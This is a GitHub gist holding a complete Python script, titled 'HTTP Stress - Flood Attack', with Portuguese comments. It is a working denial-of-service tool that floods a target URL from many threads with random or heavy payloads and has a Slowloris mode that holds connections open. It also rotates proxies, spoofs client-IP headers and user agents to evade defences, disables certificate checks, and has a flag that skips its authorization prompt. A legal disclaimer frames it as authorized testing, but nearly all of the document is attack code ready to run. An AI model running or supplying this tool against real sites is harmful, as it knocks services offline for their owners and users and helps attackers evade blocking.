Skip to content

Instantly share code, notes, and snippets.

@marcostolosa
Created September 3, 2025 11:13
Show Gist options
  • Save marcostolosa/02e6fb44f31c42dbeddc242eefba602d to your computer and use it in GitHub Desktop.
Save marcostolosa/02e6fb44f31c42dbeddc242eefba602d to your computer and use it in GitHub Desktop.
HTTP Stress - Flood Attack
#!/usr/bin/env python3
"""
HTTP Stress Testing Tool - Educational & Authorized Pentest Only
Author: Security Research Team
Version: 2.0 Professional Edition
⚠️ AVISO LEGAL: Use APENAS com autorização escrita do proprietário do sistema
Violação = Crime (Lei 12.737/2012 - Brasil) | CFAA (EUA)
"""
import threading
import requests
import time
import random
import string
import argparse
import json
import socket
import ssl
import hashlib
from datetime import datetime
from collections import deque
from urllib.parse import urlparse
import warnings
import sys
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
import signal
# Desabilita avisos SSL para testes
warnings.filterwarnings('ignore', category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
class Colors:
"""Cores para output no terminal"""
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
PURPLE = '\033[95m'
CYAN = '\033[96m'
WHITE = '\033[97m'
RESET = '\033[0m'
BOLD = '\033[1m'
class HTTPStressTester:
def __init__(self, target_url, config):
self.target_url = target_url
self.config = config
self.stats = {
'total_requests': 0,
'successful': 0,
'failed': 0,
'status_codes': {},
'response_times': deque(maxlen=1000),
'bytes_sent': 0,
'bytes_received': 0,
'start_time': time.time()
}
self.running = True
self.lock = threading.Lock()
# User-Agents realistas e atualizados
self.user_agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 Safari/17.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edge/120.0.0.0",
"Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) Mobile/15E148",
"Mozilla/5.0 (Android 14; Mobile; rv:120.0) Firefox/120.0",
"curl/8.4.0",
"Python-urllib/3.11",
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Custom-Scanner/1.0 (Pentest Tool)"
]
# Proxies para rotação (opcional)
self.proxies = self.load_proxies() if config.get('proxy_file') else []
# Headers adicionais para evasão
self.extra_headers = [
{"X-Forwarded-For": self.generate_random_ip()},
{"X-Real-IP": self.generate_random_ip()},
{"X-Originating-IP": self.generate_random_ip()},
{"Client-IP": self.generate_random_ip()},
{"CF-Connecting-IP": self.generate_random_ip()},
]
def generate_random_ip(self):
"""Gera IP aleatório para spoofing de headers"""
return f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}"
def load_proxies(self):
"""Carrega lista de proxies de arquivo"""
proxies = []
if os.path.exists(self.config.get('proxy_file', '')):
with open(self.config['proxy_file'], 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
proxies.append({'http': line, 'https': line})
return proxies
def generate_payload(self, attack_type='random'):
"""Gera diferentes tipos de payload baseado no ataque"""
payloads = {
'random': lambda: ''.join(random.choices(string.ascii_letters + string.digits, k=random.randint(100, 1000))),
'json': lambda: json.dumps({
'user': ''.join(random.choices(string.ascii_letters, k=10)),
'data': ''.join(random.choices(string.ascii_letters + string.digits, k=500)),
'timestamp': str(datetime.now()),
'session': hashlib.md5(str(random.random()).encode()).hexdigest()
}),
'xml': lambda: f"""<?xml version="1.0"?>
<request>
<user>{random.randint(1000, 9999)}</user>
<data>{''.join(random.choices(string.ascii_letters, k=200))}</data>
<timestamp>{datetime.now()}</timestamp>
</request>""",
'form': lambda: '&'.join([f"field{i}={''.join(random.choices(string.ascii_letters, k=50))}"
for i in range(random.randint(5, 20))]),
'multipart': lambda: self.generate_multipart_data(),
'slowloris': lambda: ''.join(random.choices(string.ascii_letters, k=1)), # Pequeno para Slowloris
'heavy': lambda: ''.join(random.choices(string.printable, k=random.randint(5000, 10000))), # Payload pesado
}
return payloads.get(attack_type, payloads['random'])()
def generate_multipart_data(self):
"""Gera dados multipart/form-data"""
boundary = ''.join(random.choices(string.ascii_letters + string.digits, k=16))
data = f"--{boundary}\r\n"
data += f'Content-Disposition: form-data; name="file"; filename="test.txt"\r\n'
data += "Content-Type: text/plain\r\n\r\n"
data += ''.join(random.choices(string.ascii_letters, k=1000))
data += f"\r\n--{boundary}--\r\n"
return data
def get_random_headers(self):
"""Retorna headers randomizados para evasão"""
headers = {
"User-Agent": random.choice(self.user_agents),
"Accept": random.choice([
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"application/json, text/plain, */*",
"*/*",
"text/html,application/xhtml+xml"
]),
"Accept-Language": random.choice(["en-US,en;q=0.5", "pt-BR,pt;q=0.8", "es-ES,es;q=0.9"]),
"Accept-Encoding": random.choice(["gzip, deflate", "gzip, deflate, br", "identity"]),
"Cache-Control": random.choice(["no-cache", "max-age=0", "no-store"]),
"Connection": random.choice(["keep-alive", "close"]) if not self.config.get('slowloris') else "keep-alive",
}
# Adiciona headers extras aleatoriamente
if random.random() > 0.5:
headers.update(random.choice(self.extra_headers))
# Headers específicos por tipo de ataque
if self.config.get('attack_type') == 'json':
headers["Content-Type"] = "application/json"
elif self.config.get('attack_type') == 'xml':
headers["Content-Type"] = "application/xml"
elif self.config.get('attack_type') == 'multipart':
headers["Content-Type"] = f"multipart/form-data; boundary={random.randint(1000000, 9999999)}"
else:
headers["Content-Type"] = "application/x-www-form-urlencoded"
return headers
def perform_request(self, session, method='POST'):
"""Executa uma requisição HTTP com métricas"""
proxy = random.choice(self.proxies) if self.proxies else None
headers = self.get_random_headers()
payload = self.generate_payload(self.config.get('attack_type', 'random'))
start_time = time.time()
try:
if method == 'POST':
response = session.post(
self.target_url,
data=payload,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False,
allow_redirects=self.config.get('follow_redirects', False)
)
elif method == 'GET':
response = session.get(
self.target_url,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False,
allow_redirects=self.config.get('follow_redirects', False)
)
elif method == 'HEAD':
response = session.head(
self.target_url,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 5),
verify=False
)
else: # PUT, DELETE, PATCH, etc
response = session.request(
method,
self.target_url,
data=payload,
headers=headers,
proxies=proxy,
timeout=self.config.get('timeout', 10),
verify=False
)
response_time = time.time() - start_time
# Atualiza estatísticas
with self.lock:
self.stats['total_requests'] += 1
self.stats['successful'] += 1
self.stats['status_codes'][response.status_code] = \
self.stats['status_codes'].get(response.status_code, 0) + 1
self.stats['response_times'].append(response_time)
self.stats['bytes_sent'] += len(payload.encode()) if payload else 0
self.stats['bytes_received'] += len(response.content)
return True, response.status_code, response_time
except requests.exceptions.Timeout:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, 'TIMEOUT', 0
except requests.exceptions.ConnectionError:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, 'CONNECTION_ERROR', 0
except Exception as e:
with self.lock:
self.stats['total_requests'] += 1
self.stats['failed'] += 1
return False, str(e), 0
def slowloris_attack(self):
"""Implementa ataque Slowloris (mantém conexões abertas)"""
sockets = []
# Cria sockets iniciais
for _ in range(self.config.get('threads', 50)):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
parsed = urlparse(self.target_url)
host = parsed.hostname
port = parsed.port or (443 if parsed.scheme == 'https' else 80)
if parsed.scheme == 'https':
sock = ssl.wrap_socket(sock)
sock.connect((host, port))
sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode())
sock.send(f"Host: {host}\r\n".encode())
sock.send(f"User-Agent: {random.choice(self.user_agents)}\r\n".encode())
sockets.append(sock)
with self.lock:
self.stats['total_requests'] += 1
self.stats['successful'] += 1
except Exception as e:
with self.lock:
self.stats['failed'] += 1
# Mantém conexões vivas
while self.running:
for sock in sockets:
try:
sock.send(f"X-header-{random.randint(1,5000)}: {random.randint(1,5000)}\r\n".encode())
with self.lock:
self.stats['bytes_sent'] += 50
except:
sockets.remove(sock)
try:
# Recria socket morto
new_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
new_sock.settimeout(4)
if parsed.scheme == 'https':
new_sock = ssl.wrap_socket(new_sock)
new_sock.connect((host, port))
new_sock.send(f"GET {parsed.path or '/'} HTTP/1.1\r\n".encode())
new_sock.send(f"Host: {host}\r\n".encode())
sockets.append(new_sock)
except:
pass
time.sleep(random.uniform(10, 20))
def worker_thread(self):
"""Thread worker principal para ataques normais"""
session = requests.Session()
# Configurações de performance
adapter = requests.adapters.HTTPAdapter(
pool_connections=100,
pool_maxsize=100,
max_retries=0
)
session.mount('http://', adapter)
session.mount('https://', adapter)
methods = self.config.get('methods', ['POST'])
while self.running:
method = random.choice(methods)
success, status, response_time = self.perform_request(session, method)
if self.config.get('verbose'):
timestamp = datetime.now().strftime('%H:%M:%S')
if success:
color = Colors.GREEN if status == 200 else Colors.YELLOW
print(f"{color}[{timestamp}] {method} → Status: {status} | Time: {response_time:.3f}s{Colors.RESET}")
else:
print(f"{Colors.RED}[{timestamp}] {method} → Failed: {status}{Colors.RESET}")
# Delay entre requisições
delay = self.config.get('delay', 0)
if delay > 0:
time.sleep(random.uniform(delay * 0.5, delay * 1.5))
def print_stats(self):
"""Exibe estatísticas em tempo real"""
while self.running:
time.sleep(self.config.get('stats_interval', 5))
with self.lock:
elapsed = time.time() - self.stats['start_time']
rps = self.stats['total_requests'] / elapsed if elapsed > 0 else 0
avg_response = sum(self.stats['response_times']) / len(self.stats['response_times']) \
if self.stats['response_times'] else 0
success_rate = (self.stats['successful'] / self.stats['total_requests'] * 100) \
if self.stats['total_requests'] > 0 else 0
print(f"\n{Colors.CYAN}{'='*60}")
print(f"{Colors.BOLD}📊 ESTATÍSTICAS DO TESTE - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}{Colors.RESET}")
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}")
print(f"⏱️ Tempo decorrido: {elapsed:.1f}s")
print(f"📨 Total de requisições: {self.stats['total_requests']}")
print(f"✅ Sucesso: {self.stats['successful']} ({success_rate:.1f}%)")
print(f"❌ Falhas: {self.stats['failed']}")
print(f"⚡ Requisições/seg: {rps:.2f}")
print(f"📊 Tempo médio resposta: {avg_response:.3f}s")
print(f"📤 Bytes enviados: {self.stats['bytes_sent'] / 1024:.2f} KB")
print(f"📥 Bytes recebidos: {self.stats['bytes_received'] / 1024:.2f} KB")
if self.stats['status_codes']:
print(f"\n{Colors.YELLOW}Status Codes:{Colors.RESET}")
for code, count in sorted(self.stats['status_codes'].items()):
percentage = (count / self.stats['total_requests'] * 100)
bar = '█' * int(percentage / 2)
print(f" {code}: {count:5d} ({percentage:5.1f}%) {bar}")
print(f"{Colors.CYAN}{'='*60}{Colors.RESET}")
def start(self):
"""Inicia o teste de stress"""
print(f"\n{Colors.PURPLE}{Colors.BOLD}")
print("╔═══════════════════════════════════════════════════════════╗")
print("║ HTTP STRESS TESTER - PROFESSIONAL v2.0 ║")
print("║ 🔒 AUTHORIZED USE ONLY 🔒 ║")
print("╚═══════════════════════════════════════════════════════════╝")
print(f"{Colors.RESET}")
print(f"\n{Colors.YELLOW}⚠️ AVISO LEGAL:{Colors.RESET}")
print("Este teste deve ser executado APENAS com autorização escrita!")
print("Uso não autorizado é CRIME federal (Lei 12.737/2012 - Brasil)")
# Confirmação de segurança
if not self.config.get('skip_confirmation'):
confirm = input(f"\n{Colors.RED}Você possui autorização escrita para testar {self.target_url}? (yes/no): {Colors.RESET}")
if confirm.lower() != 'yes':
print(f"{Colors.RED}Teste cancelado. Execute apenas com autorização!{Colors.RESET}")
return
print(f"\n{Colors.GREEN}🚀 Iniciando teste de stress...{Colors.RESET}")
print(f"🎯 Alvo: {self.target_url}")
print(f"🧵 Threads: {self.config.get('threads', 10)}")
print(f"⚡ Tipo de ataque: {self.config.get('attack_type', 'random')}")
print(f"🔄 Métodos: {', '.join(self.config.get('methods', ['POST']))}")
# Inicia thread de estatísticas
stats_thread = threading.Thread(target=self.print_stats)
stats_thread.daemon = True
stats_thread.start()
# Escolhe tipo de ataque
if self.config.get('slowloris'):
print(f"\n{Colors.YELLOW}Executando ataque Slowloris...{Colors.RESET}")
self.slowloris_attack()
else:
# Cria pool de threads
with ThreadPoolExecutor(max_workers=self.config.get('threads', 10)) as executor:
futures = []
for _ in range(self.config.get('threads', 10)):
future = executor.submit(self.worker_thread)
futures.append(future)
try:
# Aguarda conclusão ou interrupção
for future in as_completed(futures):
pass
except KeyboardInterrupt:
print(f"\n\n{Colors.YELLOW}⚠️ Interrompendo teste...{Colors.RESET}")
self.running = False
def stop(self):
"""Para o teste"""
self.running = False
# Estatísticas finais
elapsed = time.time() - self.stats['start_time']
print(f"\n{Colors.GREEN}{'='*60}")
print(f"{Colors.BOLD}📊 RELATÓRIO FINAL{Colors.RESET}")
print(f"{Colors.GREEN}{'='*60}{Colors.RESET}")
print(f"Duração total: {elapsed:.1f} segundos")
print(f"Total de requisições: {self.stats['total_requests']}")
print(f"Taxa média: {self.stats['total_requests']/elapsed:.2f} req/s")
print(f"Taxa de sucesso: {(self.stats['successful']/self.stats['total_requests']*100):.1f}%")
print(f"{Colors.GREEN}{'='*60}{Colors.RESET}")
def main():
parser = argparse.ArgumentParser(
description="HTTP Stress Tester - Professional Pentesting Tool",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Exemplos de uso:
python3 stress_test.py https://authorized-target.com -t 50 -d 0.1
python3 stress_test.py https://lab.local --slowloris
python3 stress_test.py https://api.test.com --attack-type json --methods POST PUT
python3 stress_test.py https://target.com --proxy-file proxies.txt
"""
)
# Argumentos principais
parser.add_argument("url", help="URL alvo (deve ter autorização!)")
parser.add_argument("-t", "--threads", type=int, default=10,
help="Número de threads concorrentes (padrão: 10)")
parser.add_argument("-d", "--delay", type=float, default=0,
help="Delay entre requisições em segundos (padrão: 0)")
# Tipos de ataque
parser.add_argument("--attack-type", choices=['random', 'json', 'xml', 'form',
'multipart', 'slowloris', 'heavy'],
default='random', help="Tipo de payload do ataque")
parser.add_argument("--slowloris", action="store_true",
help="Executa ataque Slowloris (mantém conexões abertas)")
# Métodos HTTP
parser.add_argument("--methods", nargs='+',
default=['POST'],
choices=['GET', 'POST', 'PUT', 'DELETE', 'HEAD', 'PATCH', 'OPTIONS'],
help="Métodos HTTP a usar (padrão: POST)")
# Configurações avançadas
parser.add_argument("--timeout", type=int, default=10,
help="Timeout para requisições em segundos (padrão: 10)")
parser.add_argument("--proxy-file", help="Arquivo com lista de proxies")
parser.add_argument("--follow-redirects", action="store_true",
help="Segue redirecionamentos HTTP")
parser.add_argument("--stats-interval", type=int, default=5,
help="Intervalo de atualização de estatísticas em segundos")
# Output e debug
parser.add_argument("-v", "--verbose", action="store_true",
help="Modo verbose - mostra cada requisição")
parser.add_argument("-q", "--quiet", action="store_true",
help="Modo silencioso - apenas estatísticas finais")
parser.add_argument("--skip-confirmation", action="store_true",
help="Pula confirmação de autorização (USE COM CUIDADO!)")
args = parser.parse_args()
# Validação de URL
parsed = urlparse(args.url)
if not parsed.scheme or not parsed.netloc:
print(f"{Colors.RED}❌ URL inválida! Use formato: https://example.com{Colors.RESET}")
sys.exit(1)
# Configuração
config = {
'threads': args.threads,
'delay': args.delay,
'attack_type': args.attack_type,
'slowloris': args.slowloris,
'methods': args.methods,
'timeout': args.timeout,
'proxy_file': args.proxy_file,
'follow_redirects': args.follow_redirects,
'stats_interval': args.stats_interval,
'verbose': args.verbose,
'quiet': args.quiet,
'skip_confirmation': args.skip_confirmation
}
# Inicializa e executa
tester = HTTPStressTester(args.url, config)
# Handler para CTRL+C
def signal_handler(sig, frame):
print(f"\n{Colors.YELLOW}Recebido sinal de interrupção...{Colors.RESET}")
tester.stop()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
tester.start()
except Exception as e:
print(f"{Colors.RED}❌ Erro: {e}{Colors.RESET}")
sys.exit(1)
finally:
tester.stop()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment